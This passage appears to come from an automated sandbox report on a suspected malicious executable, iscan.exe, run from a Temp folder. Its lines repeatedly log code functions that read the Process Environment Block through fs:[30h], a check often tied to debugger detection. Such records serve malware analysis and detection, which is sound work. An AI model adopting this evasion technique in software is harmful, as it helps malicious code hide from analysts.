Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A2B171 mov eax, dword ptr fs:[00000030h] 3_2_00A2B171
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4B944 mov eax, dword ptr fs:[00000030h] 3_2_00A4B944
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4B944 mov eax, dword ptr fs:[00000030h] 3_2_00A4B944
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A252A5 mov eax, dword ptr fs:[00000030h] 3_2_00A252A5
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A252A5 mov eax, dword ptr fs:[00000030h] 3_2_00A252A5
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A252A5 mov eax, dword ptr fs:[00000030h] 3_2_00A252A5
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A252A5 mov eax, dword ptr fs:[00000030h] 3_2_00A252A5
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A252A5 mov eax, dword ptr fs:[00000030h] 3_2_00A252A5
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A3AAB0 mov eax, dword ptr fs:[00000030h] 3_2_00A3AAB0
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A3AAB0 mov eax, dword ptr fs:[00000030h] 3_2_00A3AAB0
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5FAB0 mov eax, dword ptr fs:[00000030h] 3_2_00A5FAB0
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5D294 mov eax, dword ptr fs:[00000030h] 3_2_00A5D294
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5D294 mov eax, dword ptr fs:[00000030h] 3_2_00A5D294
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A52AE4 mov eax, dword ptr fs:[00000030h] 3_2_00A52AE4
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h] 3_2_00AE4AEF
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h] 3_2_00AE4AEF
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h] 3_2_00AE4AEF
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h] 3_2_00AE4AEF
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h] 3_2_00AE4AEF
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h] 3_2_00AE4AEF
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h] 3_2_00AE4AEF
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h] 3_2_00AE4AEF
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h] 3_2_00AE4AEF
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h] 3_2_00AE4AEF
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h] 3_2_00AE4AEF
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h] 3_2_00AE4AEF
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h] 3_2_00AE4AEF
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h] 3_2_00AE4AEF
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A52ACB mov eax, dword ptr fs:[00000030h] 3_2_00A52ACB
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A64A2C mov eax, dword ptr fs:[00000030h] 3_2_00A64A2C
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A64A2C mov eax, dword ptr fs:[00000030h] 3_2_00A64A2C
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4A229 mov eax, dword ptr fs:[00000030h] 3_2_00A4A229
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4A229 mov eax, dword ptr fs:[00000030h] 3_2_00A4A229
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4A229 mov eax, dword ptr fs:[00000030h] 3_2_00A4A229
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4A229 mov eax, dword ptr fs:[00000030h] 3_2_00A4A229
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4A229 mov eax, dword ptr fs:[00000030h] 3_2_00A4A229
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4A229 mov eax, dword ptr fs:[00000030h] 3_2_00A4A229
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4A229 mov eax, dword ptr fs:[00000030h] 3_2_00A4A229
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4A229 mov eax, dword ptr fs:[00000030h] 3_2_00A4A229
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4A229 mov eax, dword ptr fs:[00000030h] 3_2_00A4A229
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4B236 mov eax, dword ptr fs:[00000030h] 3_2_00A4B236
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4B236 mov eax, dword ptr fs:[00000030h] 3_2_00A4B236
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4B236 mov eax, dword ptr fs:[00000030h] 3_2_00A4B236
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4B236 mov eax, dword ptr fs:[00000030h] 3_2_00A4B236
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4B236 mov eax, dword ptr fs:[00000030h] 3_2_00A4B236
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4B236 mov eax, dword ptr fs:[00000030h] 3_2_00A4B236
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A38A0A mov eax, dword ptr fs:[00000030h] 3_2_00A38A0A
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A25210 mov eax, dword ptr fs:[00000030h] 3_2_00A25210
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A25210 mov ecx, dword ptr fs:[00000030h] 3_2_00A25210
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A25210 mov eax, dword ptr fs:[00000030h] 3_2_00A25210
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A25210 mov eax, dword ptr fs:[00000030h] 3_2_00A25210
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A2AA16 mov eax, dword ptr fs:[00000030h] 3_2_00A2AA16
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A2AA16 mov eax, dword ptr fs:[00000030h] 3_2_00A2AA16
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A43A1C mov eax, dword ptr fs:[00000030h] 3_2_00A43A1C
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AEAA16 mov eax, dword ptr fs:[00000030h] 3_2_00AEAA16
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AEAA16 mov eax, dword ptr fs:[00000030h] 3_2_00AEAA16
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00ADB260 mov eax, dword ptr fs:[00000030h] 3_2_00ADB260
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00ADB260 mov eax, dword ptr fs:[00000030h] 3_2_00ADB260
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AF8A62 mov eax, dword ptr fs:[00000030h] 3_2_00AF8A62
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A6927A mov eax, dword ptr fs:[00000030h] 3_2_00A6927A
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A29240 mov eax, dword ptr fs:[00000030h] 3_2_00A29240
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A29240 mov eax, dword ptr fs:[00000030h] 3_2_00A29240
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A29240 mov eax, dword ptr fs:[00000030h] 3_2_00A29240
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A29240 mov eax, dword ptr fs:[00000030h] 3_2_00A29240
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AEEA55 mov eax, dword ptr fs:[00000030h] 3_2_00AEEA55
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AB4257 mov eax, dword ptr fs:[00000030h] 3_2_00AB4257
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A54BAD mov eax, dword ptr fs:[00000030h] 3_2_00A54BAD
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A54BAD mov eax, dword ptr fs:[00000030h] 3_2_00A54BAD
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A54BAD mov eax, dword ptr fs:[00000030h] 3_2_00A54BAD
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AF5BA5 mov eax, dword ptr fs:[00000030h] 3_2_00AF5BA5
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE138A mov eax, dword ptr fs:[00000030h] 3_2_00AE138A
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A31B8F mov eax, dword ptr fs:[00000030h] 3_2_00A31B8F
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A31B8F mov eax, dword ptr fs:[00000030h] 3_2_00A31B8F
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00ADD380 mov ecx, dword ptr fs:[00000030h] 3_2_00ADD380
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5138B mov eax, dword ptr fs:[00000030h] 3_2_00A5138B
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5138B mov eax, dword ptr fs:[00000030h] 3_2_00A5138B
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5138B mov eax, dword ptr fs:[00000030h] 3_2_00A5138B
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A52397 mov eax, dword ptr fs:[00000030h] 3_2_00A52397
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5B390 mov eax, dword ptr fs:[00000030h] 3_2_00A5B390
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4EB9A mov eax, dword ptr fs:[00000030h] 3_2_00A4EB9A
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4EB9A mov eax, dword ptr fs:[00000030h] 3_2_00A4EB9A
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h] 3_2_00A503E2
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h] 3_2_00A503E2
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h] 3_2_00A503E2
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h] 3_2_00A503E2
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h] 3_2_00A503E2
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h] 3_2_00A503E2
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4DBE9 mov eax, dword ptr fs:[00000030h] 3_2_00A4DBE9
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AD23E3 mov ecx, dword ptr fs:[00000030h] 3_2_00AD23E3
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AD23E3 mov ecx, dword ptr fs:[00000030h] 3_2_00AD23E3
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AD23E3 mov eax, dword ptr fs:[00000030h] 3_2_00AD23E3
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AA53CA mov eax, dword ptr fs:[00000030h] 3_2_00AA53CA
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AA53CA mov eax, dword ptr fs:[00000030h] 3_2_00AA53CA
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h] 3_2_00A4A309
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h] 3_2_00A4A309
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h] 3_2_00A4A309
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h] 3_2_00A4A309
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h] 3_2_00A4A309
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h] 3_2_00A4A309
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h] 3_2_00A4A309
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h] 3_2_00A4A309
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h] 3_2_00A4A309
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h] 3_2_00A4A309
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h] 3_2_00A4A309
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h] 3_2_00A4A309
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h] 3_2_00A4A309
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h] 3_2_00A4A309
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h] 3_2_00A4A309
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h] 3_2_00A4A309
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h] 3_2_00A4A309
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h] 3_2_00A4A309
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h] 3_2_00A4A309
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h] 3_2_00A4A309
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h] 3_2_00A4A309
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE131B mov eax, dword ptr fs:[00000030h] 3_2_00AE131B
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A2DB60 mov ecx, dword ptr fs:[00000030h] 3_2_00A2DB60
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A53B7A mov eax, dword ptr fs:[00000030h] 3_2_00A53B7A
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A53B7A mov eax, dword ptr fs:[00000030h] 3_2_00A53B7A
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A2DB40 mov eax, dword ptr fs:[00000030h] 3_2_00A2DB40
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AF8B58 mov eax, dword ptr fs:[00000030h] 3_2_00AF8B58
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A2F358 mov eax, dword ptr fs:[00000030h] 3_2_00A2F358
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A3849B mov eax, dword ptr fs:[00000030h] 3_2_00A3849B
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h] 3_2_00AE4496
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h] 3_2_00AE4496
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h] 3_2_00AE4496
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h] 3_2_00AE4496
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h] 3_2_00AE4496
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h] 3_2_00AE4496
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h] 3_2_00AE4496
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h] 3_2_00AE4496
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h] 3_2_00AE4496
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h] 3_2_00AE4496
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h] 3_2_00AE4496
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h] 3_2_00AE4496
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h] 3_2_00AE4496
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE14FB mov eax, dword ptr fs:[00000030h] 3_2_00AE14FB
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AA6CF0 mov eax, dword ptr fs:[00000030h] 3_2_00AA6CF0
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AA6CF0 mov eax, dword ptr fs:[00000030h] 3_2_00AA6CF0
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AA6CF0 mov eax, dword ptr fs:[00000030h] 3_2_00AA6CF0
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AF8CD6 mov eax, dword ptr fs:[00000030h] 3_2_00AF8CD6
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5BC2C mov eax, dword ptr fs:[00000030h] 3_2_00A5BC2C
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AA6C0A mov eax, dword ptr fs:[00000030h] 3_2_00AA6C0A
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AA6C0A mov eax, dword ptr fs:[00000030h] 3_2_00AA6C0A
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AA6C0A mov eax, dword ptr fs:[00000030h] 3_2_00AA6C0A
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AA6C0A mov eax, dword ptr fs:[00000030h] 3_2_00AA6C0A
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AF740D mov eax, dword ptr fs:[00000030h] 3_2_00AF740D
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AF740D mov eax, dword ptr fs:[00000030h] 3_2_00AF740D
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AF740D mov eax, dword ptr fs:[00000030h] 3_2_00AF740D
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4746D mov eax, dword ptr fs:[00000030h] 3_2_00A4746D
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h] 3_2_00A4B477
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h] 3_2_00A4B477
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h] 3_2_00A4B477
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h] 3_2_00A4B477
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h] 3_2_00A4B477
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h] 3_2_00A4B477
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h] 3_2_00A4B477
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h] 3_2_00A4B477
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h] 3_2_00A4B477
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h] 3_2_00A4B477
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h] 3_2_00A4B477
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h] 3_2_00A4B477
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5AC7B mov eax, dword ptr fs:[00000030h] 3_2_00A5AC7B
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5AC7B mov eax, dword ptr fs:[00000030h] 3_2_00A5AC7B
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5AC7B mov eax, dword ptr fs:[00000030h] 3_2_00A5AC7B
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5AC7B mov eax, dword ptr fs:[00000030h] 3_2_00A5AC7B
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5AC7B mov eax, dword ptr fs:[00000030h] 3_2_00A5AC7B
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5AC7B mov eax, dword ptr fs:[00000030h] 3_2_00A5AC7B
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5AC7B mov eax, dword ptr fs:[00000030h] 3_2_00A5AC7B
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5AC7B mov eax, dword ptr fs:[00000030h] 3_2_00A5AC7B
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5AC7B mov eax, dword ptr fs:[00000030h] 3_2_00A5AC7B
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5AC7B mov eax, dword ptr fs:[00000030h] 3_2_00A5AC7B
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5AC7B mov eax, dword ptr fs:[00000030h] 3_2_00A5AC7B
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5A44B mov eax, dword ptr fs:[00000030h] 3_2_00A5A44B
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00ABC450 mov eax, dword ptr fs:[00000030h] 3_2_00ABC450
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00ABC450 mov eax, dword ptr fs:[00000030h] 3_2_00ABC450
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AF05AC mov eax, dword ptr fs:[00000030h] 3_2_00AF05AC
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AF05AC mov eax, dword ptr fs:[00000030h] 3_2_00AF05AC
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A535A1 mov eax, dword ptr fs:[00000030h] 3_2_00A535A1
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A51DB5 mov eax, dword ptr fs:[00000030h] 3_2_00A51DB5
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A51DB5 mov eax, dword ptr fs:[00000030h] 3_2_00A51DB5
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A51DB5 mov eax, dword ptr fs:[00000030h] 3_2_00A51DB5
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A52581 mov eax, dword ptr fs:[00000030h] 3_2_00A52581
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A52581 mov eax, dword ptr fs:[00000030h] 3_2_00A52581
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A52581 mov eax, dword ptr fs:[00000030h] 3_2_00A52581
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A52581 mov eax, dword ptr fs:[00000030h] 3_2_00A52581
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A22D8A mov eax, dword ptr fs:[00000030h] 3_2_00A22D8A
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A22D8A mov eax, dword ptr fs:[00000030h] 3_2_00A22D8A
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A22D8A mov eax, dword ptr fs:[00000030h] 3_2_00A22D8A
